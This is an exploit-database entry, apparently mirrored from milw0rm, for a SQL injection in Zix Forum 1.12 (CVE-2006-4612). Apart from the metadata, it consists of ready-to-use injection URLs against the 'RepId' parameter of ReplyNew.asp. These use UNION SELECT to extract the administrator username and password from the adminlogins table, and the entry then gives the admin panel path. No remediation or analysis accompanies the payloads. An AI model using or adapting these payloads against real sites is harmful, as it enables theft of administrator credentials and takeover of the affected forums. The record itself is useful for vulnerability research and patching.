EXPLOITS

Zix Forum 1.12 - 'RepId' SQL Injection (1)

Author: Chironex Fleckeri
type: webapps
platform: asp
port: 
date_added: 2006-09-04  
date_updated:   
verified: 1  
codes: OSVDB-28569;CVE-2006-4612  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 2306.txt  

################################################################################
##                                                                            ##
##  ©ZIXForum 1.12 <= "RepId" Remote SQL Injection                            ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##  Credit by        |  Chironex Fleckeri                                     ##
##  Mail             |  ChironeX.FleckeriX@Gmail.Com                          ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##                                                                            ##
################################################################################

##########################################################################################################################################################
#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################

##########################################################################################################################################################
#Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################

################################################################
#Admin Panel : http://www.target.com/path/theadmin/default.asp #
################################################################

# milw0rm.com [2006-09-05]